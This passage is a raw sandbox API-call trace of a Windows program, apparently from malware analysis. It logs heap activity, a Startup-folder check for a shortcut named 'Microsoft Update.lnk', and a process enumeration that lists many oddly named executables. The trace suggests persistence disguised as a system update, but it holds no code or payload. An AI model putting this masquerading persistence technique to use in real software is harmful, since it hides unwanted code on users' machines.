Flags=0x0, Size=0x8) returned 0x24b1698 [0312.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0312.890] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0312.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0312.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0312.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0312.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0312.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0312.890] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0312.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0312.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0312.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0312.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0312.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0312.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0312.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0312.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0312.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0312.890] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0312.891] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0312.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0312.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0312.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0312.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0312.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0312.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0312.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0312.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0312.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0312.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0312.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0312.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0312.892] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0312.892] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0312.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0312.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0312.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0312.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0312.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0312.892] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0312.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0312.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0312.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0312.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0312.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0312.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0312.893] CharUpperBuffW (in: lpsz="StartupDir", cchLength=0xa | out: lpsz="STARTUPDIR") returned 0xa [0312.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0312.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0312.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0312.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0312.893] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0312.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0312.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0312.893] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x8bf2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0312.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0312.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0312.893] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0312.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0312.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0312.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0312.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0312.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0312.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0312.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0312.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0312.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0312.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0312.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0312.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0312.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0312.894] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1d0) returned 0x24b2e00 [0312.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0312.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0312.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0312.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0312.894] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0312.895] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0312.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2e00 | out: hHeap=0x25c0000) returned 1 [0312.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0312.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0312.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0312.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0312.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0312.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0312.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0312.895] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0312.895] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0312.895] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0312.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0312.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0312.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0312.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0312.895] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0312.896] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0312.896] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0312.898] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0312.898] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0312.899] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0312.900] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0312.901] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0312.902] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0312.902] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0312.903] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0312.904] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0312.905] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0312.905] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.906] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.907] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.908] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.909] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.909] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0312.910] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.911] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.912] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0312.913] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0312.913] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0312.914] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0312.915] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0312.916] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0312.917] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0312.917] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0312.918] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0312.919] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0312.920] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0312.921] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0312.922] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0312.923] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0312.924] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0312.925] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0312.926] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0312.926] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0312.927] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0312.928] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0312.929] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0312.930] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0312.930] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0312.931] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, 